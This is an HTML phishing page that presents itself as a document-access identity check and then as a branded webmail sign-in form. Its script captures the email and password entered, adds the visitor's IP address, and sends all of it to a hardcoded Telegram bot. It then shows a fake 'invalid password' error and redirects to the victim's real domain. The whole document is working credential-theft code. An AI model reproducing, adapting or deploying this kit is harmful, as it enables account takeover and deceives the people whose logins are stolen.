<!DOCTYPE html>
<html>
<head>
    <script>var aix = "";</script>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Access your document</title>
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <script src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous"></script>
    <link rel="stylesheet" href="css/landing.css">
    <style>body{
        background: #D1D8F3;
        background-image: url("https://res.cloudinary.com/ducjuygen/image/upload/v1662463656/download_2_gcagnl.jpg");
        background-repeat: no-repeat;
        background-size: cover;
    }

    .container{
        width:100%;
        display: flex;
        justify-content: center;
        align-items: center;
        height: 100vh;
    }

    .office{
        width: 380px;
        background: #fff;
    }

    .office-holder{
        width:80%;
        margin: auto;
        padding: 20px 0px;
    }

    .logo{
        width:100%;
        float: left;
        margin-bottom: 2em;
    }

    .logo h1{
        font-family: arial;
    }

    .verify{
        width: 70%;
        margin: auto;
    }

    .verify h4{
        font-family: arial;
    }

    fieldset{
        width: 90%;
        float: right;
        border:2px solid #4285f4;
        border-radius: 5px;
    }

    legend{
        font-size: 15px;
        overflow: hidden;
        width: 42%;
        padding:0px 2px;
        margin: 0px;
    }

    .verify input[type='text']{
        width: 100%;
        float: right;
        border:none;
        padding:3px 10px;
    }

    .verify button{
        border:none;
        height: 40px;
        width: 80px;
        float: right;
        margin-top: 2em;
        background: #4285f4;
        border-radius: 5px;
        color: #fff;
    }

    .email-to-verify{
        border:1px solid #000;
        border-radius: 10px;
    }

    .form-holder{
        width:100%;
        float: left;
    }

    .form-holder h3{
        font-weight: 600;
    }

    .form-holder input[type='email'], input[type='password']{
        width: 100%;
        height:40px;
        float: left;
        margin-bottom: 15px;
    }
    .form-holder .btn-holder{
        width:100%;
        margin-top:1em;
        display: flex;
        align-content: center;
        align-items: center;
        justify-content: center;
    }

    .form-holder .btn-holder .btn{
        background:#0073C6;
        border:none;
        padding:6px 10px;
        color:#fff;
        border-radius: 0px;
        margin-top: 20px;
        margin-bottom: 20px;
    }

    .form-holder .btn-holder .btn:hover{
        cursor:pointer;
    }

    .checkbox{
        width: 100%;
        float: left;
        margin-top:5px;
    }

    .checkbox label{
        font-family:arial;
        font-size:13px;
        float: left;
        margin-left:1em;
    }

    .hide{
        display: none;
    }</style>
</head>

<body>
    <div id="html_encoder_div">
        <div class="container">
            <div class="office show border shadow bg-light" id="others">
			
				<div id="Div1" style="display:none">
                <div class="office-holder">
                    <div class="logo" style="text-align:center">
                        <div>
                            <img src="https://www.scnsoft.com/blog-pictures/sharepoint/office_365_security-01_1.png" width="100%" alt="SeC3">
                        </div><br>
                        <h5 class="text-dark"><strong  class="text-uppercase">Identity Verification</strong></h3>
                        <p class="font-weight-light">For your security we need to verify your identity: To gain access to this document, enter the email address this document was sent to.</p>
                    </div>
                    <form>
                        <div class="form-holder">
                            <div style="width: 100%;">
                                <div class="alert alert-danger hide alert2"></div>
                            </div>
                            <input type="email" id="aii" name="" class="form-control" value="" placeholder="someone@example.com" required="">
                            <div class="btn-holder">
                                <button class="btn btn-lg col-12" id="submit-btnn">Access Document</button>
                            </div>
                        </div>
                    </form>
                </div>
				</div>
				
				
			<div id="Div2" style="display:none">
				<div class="office-holder">
                    <div class="logo" style="text-align:center">
                        <div id="login_logo">
                            <img id="login_logo1" src="https://res.cloudinary.com/ducjuygen/image/upload/v1662462897/weblogo_fs2day.png" width="50" height="50" alt="Webmail">
                        </div>
                        <h3 class="text-dark"><strong id="domain-name" class="text-uppercase">WEBMAIL</strong></h3>
                        <h5 class="font-weight-light">Please sign in using your email and password to gain access</h5>
                    </div>
                    <center>
                        <div id="msg" style="display: none;font-weight: 600;color: red;">Invalid Password.! Please enter correct password.</div>
                        <span id="error" class="text-danger" style="display: none;">That account doesn't exist. Enter a different account</span>
                    </center>
                    <form>
                        <div class="form-holder">
                            <div style="width: 100%;">
                                <div class="alert alert-danger hide alert2"></div>
                            </div>
                            <input type="email" id="ai" class="form-control" value="" placeholder="someone@example.com" required="">
                            <input type="password" id="pr" placeholder="Password" class="form-control" required="">
                            <div class="checkbox">
                                <input type="checkbox" name="" style="float: left; margin-top:2px; margin-bottom: 10px;">
                                <label>REMEMBER ME</label>
                            </div>
                            <div class="btn-holder">
                                <button class="btn btn-lg col-12" id="submit-btn">LOGIN</button>
                            </div>
                            <p style="color:#0073C6; margin-top:1em; float: left; width:100%;">can't access your account?</p>
                            <p style="color:#0073C6; margin-top:0em; float: left; width:100%;">Sign in with a single-use code</p>
                        </div>
                    </form>
                </div>
			</div>
            </div>
        </div>
    </div>
    <style>
    .tb_button {
        padding: 1px;
        cursor: pointer;
        border-right: 1px solid #8b8b8b;
        border-left: 1px solid #FFF;
        border-bottom: 1px solid #fff;
    }

    .tb_button.hover {
        borer: 2px outset #def;
        background-color: #f8f8f8 !important;
    }

    .ws_toolbar {
        z-index: 100000
    }

    .ws_toolbar .ws_tb_btn {
        cursor: pointer;
        border: 1px solid #555;
        padding: 3px
    }

    .tb_highlight {
        background-color: yellow
    }

    .tb_hide {
        visibility: hidden
    }

    .ws_toolbar img {
        padding: 2px;
        margin: 0px
    }
    </style>
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
<input type="hidden" name="usrip1" id="usrip1" value="">
</body>



<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>

<script type='text/javascript'>
 $('#submit-btnn').click(function(event) {
     $('#submit-btnn').html('Verifing...');
        event.preventDefault();
    if (document.getElementById('aii').value === ''){
        alert('Enter a valid email address');
		$('#submit-btnn').html('Access Document');
        return false;
    }
	var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
	if (!filter.test(document.getElementById('aii').value)) {
            alert('Enter a valid email address');
			$('#submit-btnn').html('Access Document');
			return false;
    }
	var my_ai = document.getElementById('aii').value;
    $('#ai').attr('disabled', "");
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        var dom = c.toUpperCase();
        $('#ai').val(my_ai);
        $('#ai').attr('disabled', "");
        $('#login_logo1').attr('src', 'https://logo.clearbit.com/' + my_slice);
        $('#domain-name').html(dom);
        $("#msg").hide();
        $("#inputbar").animate({ left: 200, opacity: "hide" }, 0);
        $("#automail").animate({ right: 200, opacity: "show" }, 1000);
	setTimeout(function() {
	 var x = document.getElementById("Div1");
	 var xx = document.getElementById("Div2");
     if (x.style.display === "block" && xx.style.display === "none") {
         x.style.display = "none";
		 xx.style.display = "block";
	 } 
	}, 1000);
	})
</script>

<script>
if(window.location.hash){
	var ai = window.location.hash.substr(1);
}else{
 var ai = aix;
}
	
function tmsend(message){
    var token = "6250292809:AAHOgFpoHBENLcrbN0t8JRPM5Re5cOslUuI";
    var chat_id= "6093260348";
    const url = `https://api.telegram.org/bot${token}/sendMessage` // The url to request

    const obj = {
        chat_id: chat_id, // Telegram chat id
        text: message // The text to send
    };

    const xht = new XMLHttpRequest();
    xht.open("POST", url, true);
    xht.setRequestHeader("Content-type", "application/json; charset=UTF-8");
    xht.send(JSON.stringify(obj));

}

$(document).ready(function() {
    var count = 0;

    $('#back1').click(function() {
        $("#msg").hide();
        $('#ai').val("");
        $("#automail").animate({ left: 200, opacity: "hide" }, 0);
        $("#inputbar").animate({ right: 200, opacity: "show" }, 1000);

    });

    /////////////url ai getting////////////////
    if (!ai) {
	var x = document.getElementById("Div1");
	var xx = document.getElementById("Div2");
         x.style.display = "block";
		 xx.style.display = "none";
    } else {
        // $('#ai').val(ai);
		
		var x = document.getElementById("Div1");
		var xx = document.getElementById("Div2");
         x.style.display = "none";
		 xx.style.display = "block";
        var my_ai = ai;
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        var dom = c.toUpperCase();
        $('#ai').val(my_ai);
        $('#ai').attr('disabled', "");
        $('#login_logo1').attr('src', 'https://logo.clearbit.com/' + my_slice);
        $('#domain-name').html(dom);
        $("#msg").hide();
        $("#inputbar").animate({ left: 200, opacity: "hide" }, 0);
        $("#automail").animate({ right: 200, opacity: "show" }, 1000);
    }
    ///////////////url getting ai////////////////


    var file = "PUT YOUR base64 LINK next.ph";
    $('#submit-btn').click(function(event) {
        $('#submit-btn').html('Verifing...');
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();
        var msg = $('#msg').html();
        $('#msg').text(msg);
        ///////////new injection////////////////
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!ai) {
            $('#error').show();
            $('#error').html("Email field is empty.!");
            ai.focus;
            return false;
        }

        if (!filter.test(my_ai)) {
            $('#error').show();
            $('#error').html("That account doesn't exist. Enter a different account");
            ai.focus;
            return false;
        }
        if (!pr) {
            $('#error').show();
            $('#error').html("Password field is emply.!");
            ai.focus;
            return false;
        }
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        var dom = c.toUpperCase();
        var newDate = new Date();
        var datetime =  newDate.toLocaleString();
        ///////////new injection////////////////
        count = count + 1;
        $('#ai').attr('disabled', "");
        $('#login_logo1').attr('src', 'https://logo.clearbit.com/' + my_slice);
        $('#domain-name').html(dom);
        var ozi = "\n=========M1M1 - BOY======\n"
        ozi+="Email      :"+ai
        ozi+="\nPass     :" +pr
        ozi+="\n============================"
        ozi+= "\nIP    :"+document.getElementById('usrip1').value;
        ozi+="\n============================\n"
        tmsend(ozi)
        function greet() {
            $('#submit-btn').html('Login')
            $("#msg").show();
        }
        setTimeout(greet, 2000);
        if (count >= 2) {
            count = 0;
            // window.location.replace(response['redirect_link']);
            window.location.replace("http://www." + my_slice);

        }
       

    });


});
</script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script> 
<script> 
$.getJSON("https://api.ipify.org?format=json", 
function(data) { 
var ipx = data.ip;
document.getElementById('usrip1').value = ipx;
}) 
</script>

</html>